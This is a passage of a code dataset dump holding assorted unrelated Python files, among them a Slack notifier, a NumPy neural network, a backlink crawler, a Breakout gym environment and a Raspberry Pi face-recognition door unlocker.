Exiting.')\n exit()\n\n ## Read metadata file\n labels_df = pd.read_csv(INPUT_METADATA_FILE, delimiter='|')\n labels_df = labels_df.replace(np.nan, '', regex=True)\n n_paintings = len(labels_df.index)\n\n for i, row in enumerate(np.array(labels_df[['Filename', 'Title', 'Artist', 'Location', 'Serie', 'Genre', 'Style', 'Tags']])):\n \n filename, title, artist, location, serie, genres, styles, tags = row\n \n image_file = os.path.join(IMAGES_DIR, filename)\n if not os.path.isfile(image_file):\n print(\"{} is not found\".format(image_file))\n continue\n\n # print(\"{}/{}\".format(i + 1, n_paintings))\n labels = []\n\n ## Location\n if location:\n location_org = location\n location = location.strip()\n location = replace_chars(location)\n location = location.lower()\n if location in WordDict.EXCLUDING_WORDS:\n labels.append(location)\n elif location in WordDict.INCLUDING_WORDS:\n labels.append(location)\n elif location in WordDict.MAPPING_WORDS:\n location = WordDict.MAPPING_WORDS[location]\n labels.extend(location)\n else:\n locations = extract_words(location)\n locations = list(map(handle_numerals, locations))\n location = locations\n labels.extend(location)\n # print(\"\\tLocation:\", location_org, \"-->\", location)\n\n ## Serie\n if serie:\n serie_org = serie\n serie = replace_chars(serie)\n serie = serie.lower()\n if serie in WordDict.EXCLUDING_WORDS:\n labels.append(serie)\n elif serie in WordDict.INCLUDING_WORDS:\n labels.append(serie)\n elif serie in WordDict.MAPPING_WORDS:\n serie = WordDict.MAPPING_WORDS[serie]\n labels.extend(serie)\n else:\n series = extract_words(serie)\n series = list(map(handle_numerals, series))\n serie = series\n labels.extend(serie)\n # print(\"\\tSerie:\", serie_org, \"-->\", serie)\n\n ## Genre\n if genres:\n genres_org = genres\n genres = replace_chars(genres)\n genres = genres.lower()\n genres_now = []\n for genre in genres.split(','):\n genre = genre.strip()\n if genre in WordDict.EXCLUDING_WORDS:\n continue\n elif genre in WordDict.INCLUDING_WORDS:\n genres_now.append(genre)\n elif genre in WordDict.MAPPING_WORDS:\n genre = WordDict.MAPPING_WORDS[genre]\n genres_now.extend(genre)\n else:\n genres = extract_words(genre)\n genres = list(map(handle_numerals, genres))\n genre = \" \".join(genres)\n genres_now.append(genre)\n # print(\"\\tGenres:\", genres_org, \"-->\", genres_now)\n labels.extend(genres_now)\n\n ## Style\n if styles:\n styles_org = styles\n styles = replace_chars(styles)\n styles = styles.lower()\n styles_now = []\n for style in styles.split(','):\n style = style.strip()\n if style in WordDict.EXCLUDING_WORDS:\n continue\n elif style in WordDict.INCLUDING_WORDS:\n styles_now.append(style)\n elif style in WordDict.MAPPING_WORDS:\n style = WordDict.MAPPING_WORDS[style]\n styles_now.extend(style)\n else:\n styles = extract_words(style)\n styles = list(map(handle_numerals, styles))\n style = \" \".join(styles)\n styles_now.append(style)\n # print(\"\\tStyles:\", styles_org, \"-->\", styles_now)\n labels.extend(styles_now)\n\n ## Tags\n if tags:\n tags_org = tags\n tags = replace_chars(tags)\n tags = tags.lower()\n tags_now = []\n for tag in tags.split(','):\n tag = tag.strip()\n if tag in WordDict.EXCLUDING_WORDS:\n continue\n elif tag in WordDict.INCLUDING_WORDS:\n tags_now.append(tag)\n elif tag in WordDict.MAPPING_WORDS:\n tag = WordDict.MAPPING_WORDS[tag]\n tags_now.extend(tag)\n else:\n tag = handle_numerals(tag)\n if '\"' in tag:\n parts = []\n for i in tag.split('\"'):\n i = i.replace('-', ' ').strip()\n if i != '':\n parts.append(i)\n 
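# a quoted tag becomes a list of labels, one per quoted fragment\n                    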
tag = parts\n elif '-and-' in tag:\n tag = tag.split('-and-')\n tag = list(map(lambda s: s.replace('-', ' '), tag))\n elif '/' in tag:\n tag = tag.split('/')\n else:\n tag = tag.replace('-', ' ')\n tags_now.append(tag)\n # print(\"\\tTags:\", tags_org, \"-->\", tags_now)\n labels.extend(tags_now)\n\n # print('\\t\\tLabels:', labels)\n # print(\"------\")\n labels = flatten(labels)\n row_str = filename + DELIMITER\n for label in labels:\n row_str += label + DELIMITER\n row_str = row_str.strip().strip(DELIMITER) + '\\n'\n # print(row_str)\n with open(OUTPUT_LABELS_FILE, 'a') as f:\n f.write(row_str)","sub_path":"data/extract_labels.py","file_name":"extract_labels.py","file_ext":"py","file_size_in_byte":8586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"266497735","text":"# coding=utf-8\n\nimport subprocess\nimport simplejson as json\n\nfrom database.config import config\n\n\ndef send_slack_message(message, channel=\"4space\"):\n reply = {}\n reply['text'] = message\n reply['channel'] = \"#{channel}\".format(channel=channel)\n payload = 'payload={0}'.format(json.dumps(reply))\n subprocess.check_output([\n 'curl', '-X', 'POST', '--data-urlencode',\n payload, config[\"slack_url\"]\n ])\n","sub_path":"slack_handler.py","file_name":"slack_handler.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"2533597","text":"def bigger_prod(n:int, s:float) -> bool:\n my_prod = 1\n for i in range(n):\n while True:\n try:\n x = float(input('Введите число: '))\n my_prod *= x\n break\n except ValueError:\n print('Используйте только числа (разделитель - \\'.\\')')\n return(my_prod > s)\n ","sub_path":"1400_basic_tasks/chap_7/7_24.py","file_name":"7_24.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"203748938","text":"import numpy as np\n\n\n# A basic neural network (what a shock!)\n# The 'layer_sizes' parameter is a list of numbers which give the number of neurons contained in each layer.\n# The length of this list defines the total number of layers (including the input and output layers).\n# The 'activation_function' parameter defines which activation function is used for the network. The two possible\n# choices are 'sigmoid' and 'relu.'\n# Guidance from http://neuralnetworksanddeeplearning.com/\nclass NeuralNetwork:\n\n def __init__(self, layer_sizes, activation_function='sigmoid'):\n self.activations = {'sigmoid': (self.sigmoid, self.sigmoid_prime), 'relu': (self.relu, self.relu_prime)}\n self.layer_sizes = layer_sizes\n self.weights = self.create_weights()\n self.biases = self.create_biases()\n self.activation_function, self.activation_function_prime = self.activations[activation_function]\n\n # Runs the network forward to produce an output\n def run(self, input_data):\n output = input_data\n for weight_matrix, bias in zip(self.weights, self.biases):\n output = self.activation_function(np.dot(weight_matrix, output) + bias)\n return output\n\n # Trains the network on a minibatch of examples. 
The 'inputs' and 'targets' are lists of training examples and\n # target outputs respectively.\n def train_on_minibatch(self, inputs, targets, learning_rate):\n weight_gradients, bias_gradients = self.backprop(inputs, targets)\n self.weights -= learning_rate * weight_gradients\n for i, bias_gradient_matrix in zip(range(len(self.biases)), bias_gradients):\n for bias_gradient in bias_gradient_matrix.T:\n self.biases[i] -= learning_rate * bias_gradient\n\n # Returns the weight and bias gradients\n def backprop(self, inputs, targets):\n outputs = [np.array(inputs).T]\n intermediate_outputs = []\n for weight_matrix, bias in zip(self.weights, self.biases):\n bias_matrix = np.array([bias] * len(inputs)).T\n intermediate_outputs.append(np.dot(weight_matrix, outputs[-1]) + bias_matrix)\n outputs.append(self.activation_function(intermediate_outputs[-1]))\n # Derivative of the mean squared error w.r.t. the output: ∂E/∂o = 1/n(o - t)\n error_deriv_output = (outputs[-1] - np.array(targets).T) / len(inputs)\n output_deriv_int_output = self.activation_function_prime(intermediate_outputs[-1])\n error_deriv_int_output = error_deriv_output * output_deriv_int_output\n weight_gradients = [np.dot(error_deriv_int_output, outputs[-2].T)]\n bias_gradients = [error_deriv_int_output]\n for i in range(2, len(outputs)):\n # Derivative of the error w.r.t. the output of the ith layer:\n # ∂E/∂o^i = ∂E/∂(o_int)^(i + 1) * ∂(o_int)^(i + 1)/∂o^i\n error_deriv_output = np.dot(self.weights[-i + 1].T, error_deriv_int_output)\n # ∂o^i/∂(o_int)^i\n output_deriv_int_output = self.activation_function_prime(intermediate_outputs[-i])\n # ∂E/∂(o_int)^i = ∂E/∂o^i * ∂o^i/∂(o_int)^i\n error_deriv_int_output = error_deriv_output * output_deriv_int_output\n # Derivative of the error w.r.t. the weights of the ith layer: ∂E/∂w^i = ∂E/∂(o_int)^i * ∂(o_int)^i/∂w^i\n weight_gradients.append(np.dot(error_deriv_int_output, outputs[-i - 1].T))\n # Deriv. of error w.r.t. 
biases of ith layer: ∂E/∂b^i = ∂E/∂(o_int)^i * ∂(o_int)^i/∂b^i = ∂E/(∂o_int)^i\n bias_gradients.append(error_deriv_int_output)\n\n return np.array(weight_gradients[::-1]), np.array(bias_gradients[::-1])\n\n # Creates a numpy array containing weights for each layer of the neural network\n def create_weights(self):\n weights = []\n for i in range(1, len(self.layer_sizes)):\n layer_weights = []\n for neuron in range(self.layer_sizes[i]):\n neuron_weights = [np.random.normal(0) for j in range(self.layer_sizes[i - 1])]\n layer_weights.append(neuron_weights)\n weights.append(np.array(layer_weights))\n return np.array(weights)\n\n # Creates a numpy array containing biases for each layer of the network\n def create_biases(self):\n biases = []\n for layer in self.layer_sizes[1:]:\n bias = [np.random.normal(0) for i in range(layer)]\n biases.append(bias)\n return np.array(biases)\n\n @staticmethod\n # Sigmoid function\n def sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\n @staticmethod\n # The derivative of the sigmoid function\n def sigmoid_prime(x):\n return np.exp(-x) / (1 + np.exp(-x)) ** 2\n\n @staticmethod\n # Rectified Linear Unit (ReLU) function\n def relu(x):\n return np.greater(x, 0) * x\n\n @staticmethod\n # The derivative of the Rectified Linear Unit (ReLU) function\n def relu_prime(x):\n return np.greater_equal(x, 0)\n","sub_path":"NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"143876168","text":"import pandas as pd\nfrom pandas import ExcelWriter\nfrom pandas import ExcelFile\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nexcel = '' #enter the excel file name\ndf = pd.read_excel(excel, sheet_name='Sheet1')\nclient_domains = [] #enter client names\nsponsored_articles = []\n\nclass SponsoredArticle:\n def __init__(self, url, date):\n self.url = url\n self.date = date\n self.link_targets = []\n self.link_coeff = 0;\n\n def get_client_backlinks(self):\n html = requests.get(self.url).text\n soup = BeautifulSoup(html, 'html.parser')\n links = [x for x in soup.find_all('a') if x.get('href')]\n for link in links:\n if any(c in link.get('href') for c in client_domains):\n link_target = LinkTarget(link)\n link_target.update_link_status()\n self.link_targets.append(link_target)\n\n def calculate_coeff(self):\n if (len(self.link_targets)) != 0:\n self.link_coeff = 1 / (len(self.link_targets))\n\n\nclass LinkTarget:\n def __init__(self, link):\n self.link = link\n self.link_target = link.get('href')\n self.follow_status = ''\n self.anchor = link.text\n\n def update_link_status(self):\n if not self.link.get('rel') or 'nofollow' not in self.link.get('rel'):\n self.follow_status = 'DOfollow'\n elif 'nofollow' in self.link.get('rel'):\n self.follow_status = 'NOfollow'\n\ndef get_data_by_client_domain(client_domain): # filter excel data by a specific client\n return df[df['Linkziel'].str.contains(client_domain)] # careful between german and english\n\ndef get_sponsored_articles(filtered_df): # iterate on the dataframe filtered by client_domain\n i = 0 # and append the sponsored_articles\n while i < len(filtered_df) :\n article_url = filtered_df.iloc[i][0]\n article_date = filtered_df.iloc[i][3]\n sponsored_article = SponsoredArticle(article_url, article_date)\n sponsored_articles.append(sponsored_article)\n i += 1\n\n\ndef append_link_to_dic(sponsored_article):\n for link_target in sponsored_article.link_targets:\n final_df['Link 
origin'].append(sponsored_article.url)\n        final_df['Date'].append(sponsored_article.date)\n        final_df['Link target'].append(link_target.link_target)\n        final_df['Link follow status'].append(link_target.follow_status)\n        final_df['Link coeff'].append(sponsored_article.link_coeff)\n        final_df['Anchor'].append(link_target.anchor)\n\ndef export_to_excel(dic, client_domains):\n    excel_file_name = ''\n    i = 0\n    while i < len(client_domains): # just concatenate the names of the clients\n        if i < len(client_domains) - 1: # for the excel file name\n            excel_file_name += client_domains[i] + '_'\n        else:\n            excel_file_name += client_domains[i]\n        i += 1\n\n    # export to excel file\n    dic = pd.DataFrame(dic)\n    writer = pd.ExcelWriter(\"CRAWLED_\" + excel_file_name + \".xlsx\")\n    dic.to_excel(writer, sheet_name='RAW')\n    writer.save()\n\n\nif __name__ == '__main__':\n    # iterate on client_domains and create sponsored_articles objects\n    for client_domain in client_domains:\n        get_sponsored_articles(\n            get_data_by_client_domain(client_domain))\n    for sponsored_article in sponsored_articles:\n        sponsored_article.get_client_backlinks()\n        sponsored_article.calculate_coeff()\n\n    # write in excel\n    final_df = {'Link origin': [], 'Date':[], 'Link target': [], 'Link follow status': [], 'Link coeff':[], 'Anchor': [] }\n    for sponsored_article in sponsored_articles:\n        append_link_to_dic(sponsored_article)\n    export_to_excel(final_df, client_domains)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"242006613","text":"import numpy as np \nimport cv2\n\ncap = cv2.VideoCapture(0)\ncap.set(3, 640) # set width\ncap.set(4, 480) # set height\n\nwhile (True):\n    ret, frame = cap.read()\n    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n\n    cv2.imshow('frame', frame)\n    # cv2.imshow('gray', gray)\n\n    k = cv2.waitKey(30) & 0xff\n    if k == 27: # press Esc to quit\n        break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"427067303","text":"\"Problem\"\r\n\"Write a method that replaces every space in a string with '%20'. Assume the string has enough room for the extra characters, that its true length is known (at most 1000), and that it consists of upper- and lower-case English letters only.\"\r\n\"Test case\"\r\n\"Mr John Smith -> returns Mr%20John%20Smith\"\r\n\r\n\"Using Python's built-in str.replace\"\r\ndef tihuan(s):\r\n    s=s.replace(\" \",\"%20\")\r\n    return s\r\n\r\ns=\"Mr John Smith\"\r\nresult=tihuan(s)\r\nprint(result)\r\n\r\n\r\n\"Iteration approach\"\r\ndef tihuan1(s):\r\n    ss=\"\"\r\n    for i in range(len(s)):\r\n        if s[i]==\" \":\r\n            ss=ss+\"%20\"\r\n        else:\r\n            ss=ss+s[i]\r\n    return ss\r\n\r\nresult2=tihuan1(s)\r\nprint(result2)\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"字符串—空格替换.py","file_name":"字符串—空格替换.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"313845057","text":"sum_of_squares = sum(i ** 2 for i in range(1, 101))\r\n# print(sum_of_squares)\r\n\r\nsquare_of_sums = sum(i for i in range(1, 101)) ** 2\r\n# print(square_of_sums)\r\n\r\ndifference = square_of_sums - sum_of_squares\r\n# print(difference)\r\n# ahhh so, so close to perfect!\r\n# oh hi!\r\n# hey :)\r\n\r\n# :)\r\n# where's the mistake?\r\n# line 1\r\n\r\n# oh lol okay, im thinking!\r\n# so close though\r\n# i'm just gonna tell you because it's subtle\r\n# change from a list comp to a generating expression\r\n# nope\r\n# very nope\r\n# uh oh!!\r\n# 
what's the point in making a list?\r\n# all you care about is the sum\r\n# you just needed to change what line 1 used to be\r\n# (line 206 of comprehensions)\r\n\r\n# ah oh yeah the same thing again i keep on making lists!\r\n# done?\r\n# cool!\r\n# some pointless brackets in line 4 but otherwise good :)\r\n# :)\r\n# good work :)\r\n# was a very easy one to be fair, but :)\r\n\r\ndef slow(n):\r\n sum_of_squares = sum(i**2 for i in range(n+1))\r\n square_of_sums = sum(range(n+1))**2\r\n return square_of_sums - sum_of_squares\r\n\r\n# print(question6(100))\r\n\r\n# nice!\r\n# wasn't expecting line 39 to work tbh\r\n# but just realised - this solution isn't perfect!\r\n# can you think of a better maths way of doing this? :)\r\n# like I can't fault your implementation of the algorithm\r\n# but is there a better algorithm\r\n\r\n# yeah i think there is, let me try and write it!\r\n# good girl :)\r\n\r\ndef fast(n):\r\n sum_of_squares = (n * (n + 1) * (2 * n + 1)) // 6\r\n square_of_sums = ((n * (n + 1)) // 2) ** 2\r\n return square_of_sums - sum_of_squares\r\n\r\n# print(question6_2(100))\r\n\r\n# done!\r\n\r\nimport time\r\nprint(' | '.join(['{:^20}', '{:^15}', '{:^15}']).format('n', 'slow', 'fast'))\r\nprint('+'.join(['-'*21, '-'*17, '-'*16]))\r\n\r\nfor k in range(9):\r\n n = 10**k\r\n print('{:>20}'.format(n), end='', flush=True)\r\n\r\n for function in [slow, fast]:\r\n print(' | ', end='', flush=True)\r\n start = time.time()\r\n function(n)\r\n duration = time.time() - start\r\n print(\"{:15.5f}\".format(duration), end='', flush=True)\r\n print()\r\n\r\n# on my machine, k=10 would take an hour\r\n# ooh woah i just saw this! so cool the way you've formatted it\r\n# lol lets not to k = 10 then!\r\n\r\n# yeah! wanted to demonstrate the time difference between the two methods\r\nprint()\r\nprint(' | '.join(['{:^20}', '{:^15}']).format('n', 'fast'))\r\nprint('+'.join(['-'*21, '-'*17]))\r\n\r\nfor p in range(10):\r\n k = 10**p\r\n n = 2**k\r\n\r\n print('{:>20} | '.format('2^'+str(k)), end='', flush=True)\r\n start = time.time()\r\n function(n)\r\n duration = time.time() - start\r\n print(\"{:15.5f}\".format(duration), end='', flush=True)\r\n print()\r\n","sub_path":"Euler/q006.py","file_name":"q006.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"612684367","text":"import gym\nimport cv2\nfrom multiprocessing import Process, Pipe\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass Environment(Process):\n def __init__(self, is_render, env_idx, child_conn):\n super(Environment, self).__init__()\n self.is_render = is_render\n self.env_idx = env_idx\n self.child_conn = child_conn\n self.steps = 0\n self.episode = 0\n self.score = 0\n self.history = np.zeros([84, 84, 4])\n self.env = gym.make('BreakoutDeterministic-v4')\n self.reset()\n self.lives = self.env.env.ale.lives()\n\n def run(self):\n super(Environment, self).run()\n while True:\n action = self.child_conn.recv()\n if self.is_render == True:\n self.env.render()\n\n _, reward, done, info = self.env.step(action + 1)\n\n if self.lives > info['ale.lives'] and info['ale.lives'] > 0:\n force_done = True\n self.lives = info['ale.lives']\n else:\n force_done = done\n\n if force_done:\n reward = -1\n\n if force_done:\n self.env.step(1)\n\n self.score += reward\n self.history[:, :, :3] = self.history[:, :, 1:]\n self.history[:, :, 3] = self.pre_proc(\n self.env.env.ale.getScreenGrayscale().squeeze().astype('float32'))\n\n if done:\n 
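# episode finished: rebuild the initial 4-frame stack before sending the step result\n                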
self.history = self.reset()\n\n self.child_conn.send([self.history[:, :, :], reward, force_done, done])\n\n def reset(self):\n self.episode += 1\n self.env.reset()\n self.lives = self.env.env.ale.lives()\n self.get_init_state(self.env.env.ale.getScreenGrayscale().squeeze().astype('float32'))\n return self.history[:, :, :]\n\n def pre_proc(self, x):\n x = cv2.resize(x, (84, 84))\n x *= (1.0 / 255.0)\n return x\n\n\n def get_init_state(self, s):\n for i in range(4):\n self.history[:, :, i] = self.pre_proc(s)","sub_path":"breakout_environment.py","file_name":"breakout_environment.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"124133624","text":"# -*- coding: utf-8 -*-\n# Interpreter 133.133.30.99 python 3.0.1\n\n\"\"\"\n提取轨迹,\n\"\"\"\n\nfrom limiao.uic.common.file_util import get_file_list\n\n\ndef extract():\n file_list = get_file_list(\"H:\\\\UCAS\\MPCG\\Source\\data\\Bus\\Bus-201508\\\\trip_complete\", [])\n file_out = open(\"E:\\\\Files\\\\UCAS\\MPCG\\experiment\\\\uic\\odt.txt\", \"w\", encoding=\"UTF-8\")\n for f in file_list:\n odts = []\n print(f)\n with open(f, encoding=\"UTF-8\") as fileObject:\n for line in fileObject.readlines():\n t = line.split(\"\\t\")\n odts.append(\"\\t\".join(t[0:11]).strip(\"\\n\") + \"\\n\")\n file_out.writelines(odts)\n file_out.close()\n\n\nif __name__ == \"__main__\":\n a = [1]\n b = [2]\n print(a+b)\n\n","sub_path":"limiao/uic/extraction/extract_trajectory.py","file_name":"extract_trajectory.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"430892629","text":"from __future__ import print_function, absolute_import\nimport subprocess\nimport unittest\nimport os\nimport sys\nimport time\n\nfrom test.ipc.util import ShellProcess\n\n\n_ROOT = os.path.dirname(os.path.realpath(__file__))\ndef here(*x):\n return os.path.join(_ROOT, *x)\n\n\nclass BasicBoltTester(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n args = [\"python\", here(\"dummy_basic_bolt.py\")]\n cls.proc = subprocess.Popen(args, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n print(\"Waiting for subprocess to start...\")\n time.sleep(1) # time for the subprocess to start\n if cls.proc.poll() is not None:\n raise Exception(\"Could not create subprocess.\\n{}\"\n .format(\"\".join(cls.proc.stderr.readlines())))\n cls.shell_proc = ShellProcess(cls.proc.stdout, cls.proc.stdin)\n\n def test_1_initial_handshake(self):\n msg = {\n \"conf\": {},\n \"context\": {},\n \"pidDir\": here()\n }\n BasicBoltTester.shell_proc.write_message(msg)\n res = BasicBoltTester.shell_proc.read_message()\n\n self.assertIsInstance(res, dict)\n self.assertEqual(res.get(\"pid\"), BasicBoltTester.proc.pid)\n pid = str(res[\"pid\"])\n self.assertTrue(os.path.exists(here(pid)))\n self.assertTrue(os.path.isfile(here(pid)))\n\n def test_2_auto_ack(self):\n msg = {\n \"id\": \"noop\",\n \"comp\": \"word-spout\",\n \"stream\": \"default\",\n \"task\": 0,\n \"tuple\": [\"snow white and the seven dwarfs\", \"field2\", 3, 4.252]\n }\n BasicBoltTester.shell_proc.write_message(msg)\n res = BasicBoltTester.shell_proc.read_message()\n self.assertEqual(res, {\"command\": \"ack\", \"id\": msg[\"id\"]})\n\n def test_3_auto_anchor(self):\n msg = {\n \"id\": \"emit\",\n \"comp\": \"word-spout\",\n \"stream\": \"default\",\n \"task\": 0,\n \"tuple\": [\"snow white and the seven dwarfs\", \"field2\", 3, 
4.252]\n }\n\n BasicBoltTester.shell_proc.write_message(msg)\n res = BasicBoltTester.shell_proc.read_message()\n self.assertEqual(res.get(\"command\"), \"emit\")\n self.assertEqual(msg[\"tuple\"], res.get(\"tuple\"))\n self.assertEqual([msg[\"id\"],], res.get(\"anchors\"))\n\n\n @classmethod\n def tearDownClass(cls):\n os.remove(here(str(cls.proc.pid)))\n cls.proc.kill()\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/ipc/test_basic_bolt.py","file_name":"test_basic_bolt.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"333475209","text":"#!/usr/bin/env python3\n\n__author__ = \"Mads Ludvig Timm Fagerlund\"\n__credits__ = [\"Mads Ludvig Timm Fagerlund\", \"Benjamin Fyrstenborg Stigsen\", \"Jacob Inberg Østergaard\", \"Oliver Holmgaard\"]\n__license__ = \"MIT\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"Mads Ludvig Timm Fagerlund\"\n__email__ = \"mf@kifaplast.dk\"\n__status__ = \"Development\"\n\n# Import modules\nimport face_recognition\nimport numpy\nimport picamera\nimport RPi.GPIO as GPIO\nimport multiprocessing\nimport signal\nfrom os import listdir\nfrom sys import exit\nfrom time import sleep\n\n# Folder directories\ndirectory_array = [\"known_faces/\", \"known_admin_faces/\"]\n\n# GPIO pin and delay setup\nrelay_gpio_pin = 4\nrelay_switch_delay = 0.5\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(relay_gpio_pin, GPIO.OUT)\n\n# Learned name, privilege and encoding for learned persons\nidentities = []\n\n# Variables for camera\ncamera = picamera.PiCamera()\ncamera.resolution = (960, 720)\noutput = numpy.empty((720, 960, 3), dtype=numpy.uint8)\n\n# Prints message, cleans GPIO pins and exits program\ndef signalHandler(sig, frame):\n GPIO.cleanup()\n print(\"\\nGPIO pins has been cleaned. 
Quitting..\")\n    exit(0)\n\n# Make ctrl-z and ctrl-c trigger signalHandler function\nsignal.signal(signal.SIGTSTP, signalHandler)\nsignal.signal(signal.SIGINT, signalHandler)\n\ndef extractEncodings():\n    encodings = []\n\n    for identity in identities:\n        encodings.append(identity[2])  # identities entries are [name, privilege, encoding]\n\n    return(encodings)\n\n# Learns face names and encodings for pictures in known directories\ndef learnFaces(privilege):\n\n    directory = directory_array[privilege]\n\n    # Inform user of script beginning to recognize faces with given privilege\n    print(f\"Learning to recognize privilege {privilege} faces...\")\n    # Variable for counting face encodings encoded\n    count = 0\n\n    # Loop for all files in specified directory\n    for file in listdir(directory):\n\n        # If the file ends with .jpg then run:\n        if file.endswith(\".jpg\"):\n\n            # Remove file extension from string\n            name = str(file[:-4])\n\n            # Add filename to directory to get path for file\n            file_directory = directory + file\n\n            # Create face encodings for the image (an empty list if no face was found)\n            encodings = face_recognition.face_encodings(face_recognition.load_image_file(file_directory))\n\n            # If encoding did not return anything then:\n            if len(encodings) == 0:\n\n                # Print that face was not found in file\n                print(f\"Face was not found in image: {file_directory}\")\n            \n            # If encoding did return an encoding then:\n            else:\n\n                # Keep the first encoding found in the image\n                encoding = encodings[0]\n\n                # Add 1 to count variable\n                count += 1\n\n                # Append the face name, given privilege and encoding to the identities array\n                identities.append([name, privilege, encoding])\n\n                # Print name of person which has been learned to recognize and with which privilege\n                print(f\"Learned to recognize {name} as face with privilege {privilege}\")\n\n    # Print how many faces were learned and recognized and with which privilege\n    print(f\"Learned and encoded {count} faces with privilege {privilege}\")\n\n# Checks for faces in frame and compares to known faces\ndef frameCheck(output_camera):\n    # Locate faces in current frame\n    frame_face_locations = face_recognition.face_locations(output_camera)\n\n    print(f\"{len(frame_face_locations)} faces found in frame\")\n\n    if len(frame_face_locations) > 0:\n\n        print(\"Encoding face(s)...\")\n\n        # Encode face encodings from face locations and image\n        frame_face_encodings = face_recognition.face_encodings(output_camera, frame_face_locations)\n\n        print(\"Encoded face(s)\")\n\n        # Loop over each face encodings found in current frame\n        for face_encoding in frame_face_encodings:\n\n            # Compare face encodings for current frame with the learned face encodings\n            matches = face_recognition.compare_faces(extractEncodings(), face_encoding)\n\n            # If only one True value is found in compare array\n            if matches.count(True) == 1:\n            \n                # Let name index be the index of the position of True in array\n                name_index = matches.index(True)\n\n                # If the recognized face is privilege 1\n                if (identities[name_index][1] == 1):\n\n                    # Greet user and unlock door\n                    print(f\"Welcome {identities[name_index][0]}, Unlocking door\")\n                    GPIO.output(relay_gpio_pin, 1)\n                    sleep(relay_switch_delay)\n                    GPIO.output(relay_gpio_pin, 0)\n\n                # If the recognized face is privilege 0\n                elif (identities[name_index][1] == 0):\n\n                    # Greet user\n                    print(f\"Hello {identities[name_index][0]}\")\n\n            # If no matches was found\n            elif matches.count(True) == 0:\n\n                print(\"You are not recognized in the database\")\n\n            # If more than 1 encoding matched current encoding\n            elif matches.count(True) > 1:\n\n                print(\"Reading discard. 
More than one person recognized per face\")\n\n# Define multiprocessing pool\npool = multiprocessing.Pool(processes=multiprocessing.cpu_count())\n\nlearnFaces(0)\nlearnFaces(1)\n\nwhile True:\n # Print dot for every frame captured with camera\n print(\".\")\n\n # Capture frame from camera and assign to output\n camera.capture(output, format=\"rgb\")\n \n # Map frameCheck, with output as argument, to pool\n pool.apply_async(frameCheck, args=(output,))","sub_path":"src/facerec.py","file_name":"facerec.py","file_ext":"py","file_size_in_byte":5614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"95930776","text":"#-*- coding:utf-8 _*- \n\"\"\" \n@author:Administrator\n@file: test_one_hot_encoding.py\n@time: 2018/7/23\n\"\"\"\nimport pandas as pd\nfrom sklearn.preprocessing import OneHotEncoder\nimport numpy as np\n\ndata = pd.read_csv('month_4_1.csv',header=0)\n# column = data['column']\n# column_list =set(column)\n# print(column_list)\n\n# column_dict = {}\n# for index,value in enumerate(column_list):\n# column_dict[value] = index\n# print(column_dict)\n# \n# column_new = []\n# for i in column:\n# column_new.append(column_dict[i])\n# # print(len(column_new))\n# # print(column_new)\n# # print(column_new)\n# column_new =np.array( pd.Series(column_new)).reshape(-1,1)\n# enc = OneHotEncoder()\n# column_enc = enc.fit_transform(column_new)\n# column_env_array = column_enc.toarray()\n# # print(column_enc.toarray().shape)\n# column_dataframe = pd.DataFrame(column_env_array,columns=[col for col in column_dict.keys()])\n# data_merge = pd.concat((data,column_dataframe),axis=1)\n# print(data_merge)\n# # print(len(column))\n# # print(column)\n\ndef one_hot_encode_column(dataframe,column_name):\n # data = pd.read_csv('month_4_1.csv', header=0)\n # Get the column that needs one-hot encoding (use the dataframe argument, not the global data)\n column = dataframe[column_name]\n # Get the categories of the current column; a set gives them directly\n column_set = set(column)\n print(len(column_set))\n # Map each string value to an integer label and store it in a dict\n column_dict = {}\n for index, value in enumerate(column_set):\n column_dict[value] = index\n # Convert the column values to numbers\n column_new = []\n for i in column:\n column_new.append(column_dict[i])\n column_new = np.array(pd.Series(column_new)).reshape(-1, 1)\n # Run the encoder\n enc = OneHotEncoder()\n column_enc = enc.fit_transform(column_new)\n column_env_array = column_enc.toarray()\n # Merge back into one DataFrame\n column_dataframe = pd.DataFrame(column_env_array, columns=[col for col in column_dict.keys()])\n data_merge = pd.concat((dataframe, column_dataframe), axis=1)\n # Drop the column that has just been encoded:\n data_merge = data_merge.drop(columns=column_name)\n return data_merge\n\n\n# new_data = one_hot_encode_column(data,'province')\n# print(data.shape)\n# print(new_data.shape)\n# new_data1 = 